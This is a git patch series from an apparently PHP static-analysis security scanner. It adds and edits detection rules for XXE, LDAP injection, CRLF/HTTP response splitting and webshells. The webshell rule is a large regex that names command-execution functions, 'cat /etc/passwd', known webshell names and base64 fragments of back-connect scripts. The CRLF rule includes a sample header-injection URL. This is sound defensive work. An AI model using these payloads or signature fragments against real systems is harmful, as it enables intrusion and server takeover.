From 70369c5b38ed8f0af463ac8a9ea1747b404f2fe4 Mon Sep 17 00:00:00 2001 From: braveghz Date: Wed, 30 Aug 2017 10:09:06 +0800 Subject: [PATCH 01/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-270001?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-270001.xml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/rules/CVI-270001.xml b/rules/CVI-270001.xml index 3803a25b..134d686d 100644 --- a/rules/CVI-270001.xml +++ b/rules/CVI-270001.xml @@ -7,17 +7,17 @@ + ]]> + ]]> @@ -32,12 +32,12 @@ 敏感信息泄露 探测内网,获取服务器权限 进行拒绝服务攻击,影响正常业务 - 敏感数据被盗取。 - 造成服务宕机。 + 敏感数据被盗取 + 造成服务宕机 ## 修复方案 1. 使用 `libxml_disable_entity_loader(true);` - 2. 过滤用户提交的XML数据,关键词:` - + From 819dbe6099fec2d15b8215b0f7ca92bf6d5332b9 Mon Sep 17 00:00:00 2001 From: braveghz Date: Wed, 30 Aug 2017 10:21:19 +0800 Subject: [PATCH 02/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-250001=20LDAP?= =?UTF-8?q?=E6=B3=A8=E5=85=A5?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-250001.xml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/CVI-250001.xml diff --git a/rules/CVI-250001.xml b/rules/CVI-250001.xml new file mode 100644 index 00000000..73530215 --- /dev/null +++ b/rules/CVI-250001.xml @@ -0,0 +1,24 @@ + + + + + + + + + + + ## 安全风险 + + LDAP Injection + 允许进行LDAP查询 + 输入未进行过滤 ---> LDAP注入 + 这种威胁可以让攻击者能够从LADP树中提取到很多很重要的信息 + + ## 修复方案 + 对用户输入数据中包含的”语言本身的保留字符”进行转义 + + + + + + From f270b7af8fe6d217965f0c93475320b33bf8fc81 Mon Sep 17 00:00:00 2001 From: braveghz Date: Wed, 30 Aug 2017 11:26:36 +0800 Subject: [PATCH 03/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-220001=20HRS?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-220001.xml | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/rules/CVI-220001.xml b/rules/CVI-220001.xml index 3a7567fc..863f50c5 100644 --- a/rules/CVI-220001.xml +++ b/rules/CVI-220001.xml @@ -1,24 +1,32 @@ - - + + + + ## 安全风险 - `` - `/index.php?url=a%0a%0dContent-Type:%20text/html%0a%0d%0a%0d` + CRLF是"回车+换行"(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器根据这两个CRLF来取出HTTP内容并显示出来。 + 所以,一旦能够控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting. + CRLF Injection (CRLF注入) / HTTP Response Splitting(HRS) ## 修复方案 使用白名单判断 + + ## 代码示例 + + `` 构造 + `/index.php?url=a%0a%0dContent-Type:%20text/html%0a%0d%0a%0d`发生注入 + + 修复方法:设置白名单,限制输入的URL ```php ``` - - - + \ No newline at end of file From 75820aa8e4f442bd7022881975f96f5332f06773 Mon Sep 17 00:00:00 2001 From: braveghz Date: Thu, 31 Aug 2017 10:28:09 +0800 Subject: [PATCH 04/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-360001=20webshell?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360001.xml | 58 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 rules/CVI-360001.xml diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml new file mode 100644 index 00000000..193812a1 --- /dev/null +++ b/rules/CVI-360001.xml @@ -0,0 +1,58 @@ + + + + + )\bassert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})))| + (\\$\s*(\w+)\s*=[\\s\\(\]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\\s\\S]{0,200}(?)\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\\s]*\\(+[\\s\"/*]*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(\"]*\\$\s*\\1)))| + ((preg_replace|preg_filter)[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\\s\\(](101|0x65|0145|\\d+)[^,]{0,25}\s*|['\"]\s*(([^\\s])[^,]{0,20}\\7['\"]*|[\\(\\}\[].{0,20}[\\(\\}\\]])\w*e\w*['\"])\s*,([^\\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))))| + (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\\s\\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\\|[^\\|]*\\||\\\\'[^']*')\\w{0,5}e\\w{0,5}['\"])[\\s\\S]{0,1000}(preg_replace|preg_filter)[/*\\s]*\\([/*\\s]*\\$\s*\\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))| + (\\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\\s\\S]{0,1000}(preg_replace|preg_filter)[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\\s\\(](101|0x65|0145|\\d+)[^,]{0,25}\s*|['\"]\s*(([^\\s])[^,]{0,20}\\10|[\\(\\}\[].{0,20}[\\(\\}\\]])\w*e\w*['\"])\s*,([^\\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\\$\\1))| + ((array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\\s\\S]*->u[ak]sort)\s*\\(+\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\\)]{0,250},[^;\\),]{0,50}\\$[^;\\),]{0,50}\\))))| + (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\\s\\S]{0,200}(?)\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\\s\\S]*->u[ak]sort)\b\s*\\(+\s*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1))[^,;]*,[^;\\)]{0,50}\\$[^;\\)]{0,50}\\))| + (((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\\s\\S]*->\s*createFunction)\s*\\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\\))| + (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\\\x|[^,;]*?['\"]\s*\\.\s*['\"]))[\\s\\S]{0,1000}(?)((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\\s\\S]*->\s*createFunction)\s*\\(+[^,]*\\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\\$\s*\\1\s*\\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| + (\\$(\w*)\s*=\s*\bcreate_function\b\s*\\(+\s*[^;\n\r\\)]{1,100},\s*(['\"]\s*[^;\n\r\\)]{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\\)]{0,100}file_get_contents.{1,})\s*\\)[\\s\\S]+\\$\\1\s*\\([^\\)]*\\))| + (\\$(\w*)\s*=\s*\bcreate_function\b\s*\\([^;]*;[\\s\\S]*\\$\\1\s*\\([^\\)]*(['\"]\s*[^;\n\r\\)]{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\\)]{0,100}file_get_contents.{1,}))| + (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\\s\\S]{0,200}create_function\s*\\(+[^,]{1,100},['\"\\s]*(\\$\s*\\1['\"\\s]*\\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| + (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\\()[\\s\\S]{0,200}(?\\s])\s*\\$\\1\s*\\(+[^\\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))| + (sqlite_create_function\s*\\([\\s\\S]{0,200}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\\s\\S]{0,200}sqlite_create_function\s*\\()| + (\b(filter_var|filter_var_array)\b\s*\\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)))| + (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\\()[\\s\\S]{0,200}\b(filter_var|filter_var_array)\b\s*\\(.*FILTER_CALLBACK[^;]*\\$\\1)| + (\b(mb_ereg_replace|mb_eregi_replace)\b\s*\\((.*,){3}\s*(['\"][^,\"'\\)]*e[^,\"'\\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\\(\s*101|chr\s*\\(\s*0x65|chr\s*\\(\s*0145)\s*\\))| + (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\\s\\(]*(101|0x65|0145))[\\s\\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\\((.*,){3}\s*\\$\\1)| + (array_walk(_recursive)?\s*\\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})))| + (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\\s\\S]{0,200}array_walk(_recursive)?\s*\\([^;,]*,\s*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| + (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\b\s*\\(\s*(file_get_contents\s*\\(\s*)?['\"]php://input)| + (^(\\xff\\xd8|\\x89\\x50|GIF89a|GIF87a|BM|\\x00\\x00\\x01\\x00\\x01)[\\s\\S]*<\\?\s*php)| + (\\$(\\w)=\$[a-zA-Z]\\('',\$\\w\\);\$\\1\\(\\);)| + (\$(\w+)\s*=\s*str_replace\s*\\([\\s\\S]*\$(\w+)\s*=\s*\$(\w+)(([\\s\\S]{0,255})|(\s*\\(\\'\\',\s*(\$(\w+)\s*\\(\s*)+))\$\\1\s*\\([\\s\\S]{0,100};?\s*\$\\2\\(?\s*\\))| + (ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\)))| + (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\())| + (eval\(\"\\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass)| + (\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se)| + (preg_replace\s*\\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c)| + (ini_get\s*\(\s*\"disable_functions\"\s*\\)|\\d\s*=>\s*array\s*\\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\\(base64_decode\\(|crypt\\(\$_SERVER\['HTTP_H0ST'\\],\\d+\\)==|if\\(file_exists\\(\$settings\['STOPFILE'\\]\\)\\))| + (\$nofuncs='no\s*exec\s*functions|udf\\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|Safes\s*Mode\s*Shell|Siyanur\\.PHP\s*|c999shexit\\(\\)|\$c99sh_|c99_sess_put\\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\\(|coded\s*by\s*tjomi4|john\\.barker446@gmail\\.com|eval\\(\"\\\\\$x=gzin\"|eval\\(\"\\?>\"\\.gzinflate\\(base64_decode\\(|eval\\(gzinflate\\(base64_decode\\(|eval\\(gzuncompress\\(base64_decode\\(|eval\\(gzinflate\\(str_rot13\\(base64_decode\\(|function_exists\\(\"zigetwar_buff_prepare\"\\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\\(\"IIS://localhost/w3svc\"\\)|n57http-based\[\s*-\\]terminal|Dosya\s*Olu|errorlog\\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\\(\"system\"==\$seletefunc\\)\\?system\\(\$shellcmd\\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\\.'code'|phpsocks5_encrypt\\(|define\\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\\(\$__C_C)| + (PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\\(\"N3tsh_surl\"\\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\\]|function_exists\\(\"k1r4_sess_put\"\\)|http://www.7jyewu.cn/|scookie\\('phpspypass|PHVayv.php\\?duzkaydet=|phpRemoteView|define\\('envlpass',|KingDefacer_getupdate\\(|relative2absolute\\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\\]\[\$treeroot\\]|strtolower\\(\$cmd\\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\\+yNjW62S|\$_uU\\(83\\)\\.\$_uU\\(84\\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\\\x50\\\\x4b\\\\x03\\\\x04\\\\x0a\\\\x00\\\\x00\\\\x00\\\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD)| + (\$(\w+)[\\s]*\\=[\\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\\s\\S]*(?<!\\>)\$(?:\\1\\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\\)|(\w+)\s*\\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\\s\\S]*(?<!\\>)\$(\\1\\(\s*\$\\2|\\2\\(\s*\$\\1)\s*\\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\\(\s*\$\\1\s*\\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\\d+)\\]\\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\\d+)\\]\s*\\)) + + + + ]]></match> + <level value="7"/> + <solution> + ## 安全风险 + + ## 修复方案 + </solution> + <test> + <case assert="true"><![CDATA[ + ]]></case> + <case assert="false"><![CDATA[ + ]]></case> + </test> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file From ba70867ae7c11606a49418afb8ce83d248ea9602 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 10:49:22 +0800 Subject: [PATCH 05/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-170002=20PHP=20LFI/?= =?UTF-8?q?RFI?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360001.xml | 68 +++++++++++++++++++++----------------------- 1 file changed, 33 insertions(+), 35 deletions(-) diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml index 193812a1..19aa4b10 100644 --- a/rules/CVI-360001.xml +++ b/rules/CVI-360001.xml @@ -3,42 +3,40 @@ <name value="WebShell"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - ([\r\\n;/\\*]+ \s*\b(include|require)(_once)?\b[\\s\\(]*['\"][^\\n'\"]{1,100}((\\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\\_(tmp|log))|((http|https|file|php|data|ftp)\\://.{0,25}))['\"][\\s\\)]*[\r\n;/\\*]+)| - ((?<!->)\bassert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})))| - (\\$\s*(\w+)\s*=[\\s\\(\]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\\s\\S]{0,200}(?<!\\>)\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\\s]*\\(+[\\s\"/*]*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(\"]*\\$\s*\\1)))| - ((preg_replace|preg_filter)[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\\s\\(](101|0x65|0145|\\d+)[^,]{0,25}\s*|['\"]\s*(([^\\s])[^,]{0,20}\\7['\"]*|[\\(\\}\[].{0,20}[\\(\\}\\]])\w*e\w*['\"])\s*,([^\\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))))| - (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\\s\\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\\|[^\\|]*\\||\\\\'[^']*')\\w{0,5}e\\w{0,5}['\"])[\\s\\S]{0,1000}(preg_replace|preg_filter)[/*\\s]*\\([/*\\s]*\\$\s*\\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))| - (\\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\\s\\S]{0,1000}(preg_replace|preg_filter)[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\\s\\(](101|0x65|0145|\\d+)[^,]{0,25}\s*|['\"]\s*(([^\\s])[^,]{0,20}\\10|[\\(\\}\[].{0,20}[\\(\\}\\]])\w*e\w*['\"])\s*,([^\\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\\$\\1))| - ((array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\\s\\S]*->u[ak]sort)\s*\\(+\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\\)]{0,250},[^;\\),]{0,50}\\$[^;\\),]{0,50}\\))))| - (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\\s\\S]{0,200}(?<!\\>)\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\\s\\S]*->u[ak]sort)\b\s*\\(+\s*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1))[^,;]*,[^;\\)]{0,50}\\$[^;\\)]{0,50}\\))| - (((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\\s\\S]*->\s*createFunction)\s*\\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\\))| - (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\\\x|[^,;]*?['\"]\s*\\.\s*['\"]))[\\s\\S]{0,1000}(?<!\\>)((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\\s\\S]*->\s*createFunction)\s*\\(+[^,]*\\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\\$\s*\\1\s*\\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| - (\\$(\w*)\s*=\s*\bcreate_function\b\s*\\(+\s*[^;\n\r\\)]{1,100},\s*(['\"]\s*[^;\n\r\\)]{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\\)]{0,100}file_get_contents.{1,})\s*\\)[\\s\\S]+\\$\\1\s*\\([^\\)]*\\))| - (\\$(\w*)\s*=\s*\bcreate_function\b\s*\\([^;]*;[\\s\\S]*\\$\\1\s*\\([^\\)]*(['\"]\s*[^;\n\r\\)]{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\\)]{0,100}file_get_contents.{1,}))| - (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\\s\\S]{0,200}create_function\s*\\(+[^,]{1,100},['\"\\s]*(\\$\s*\\1['\"\\s]*\\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| - (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\\()[\\s\\S]{0,200}(?<![:>\\s])\s*\\$\\1\s*\\(+[^\\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))| - (sqlite_create_function\s*\\([\\s\\S]{0,200}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\\s\\S]{0,200}sqlite_create_function\s*\\()| - (\b(filter_var|filter_var_array)\b\s*\\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)))| - (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\\()[\\s\\S]{0,200}\b(filter_var|filter_var_array)\b\s*\\(.*FILTER_CALLBACK[^;]*\\$\\1)| - (\b(mb_ereg_replace|mb_eregi_replace)\b\s*\\((.*,){3}\s*(['\"][^,\"'\\)]*e[^,\"'\\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\\(\s*101|chr\s*\\(\s*0x65|chr\s*\\(\s*0145)\s*\\))| - (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\\s\\(]*(101|0x65|0145))[\\s\\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\\((.*,){3}\s*\\$\\1)| - (array_walk(_recursive)?\s*\\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})))| - 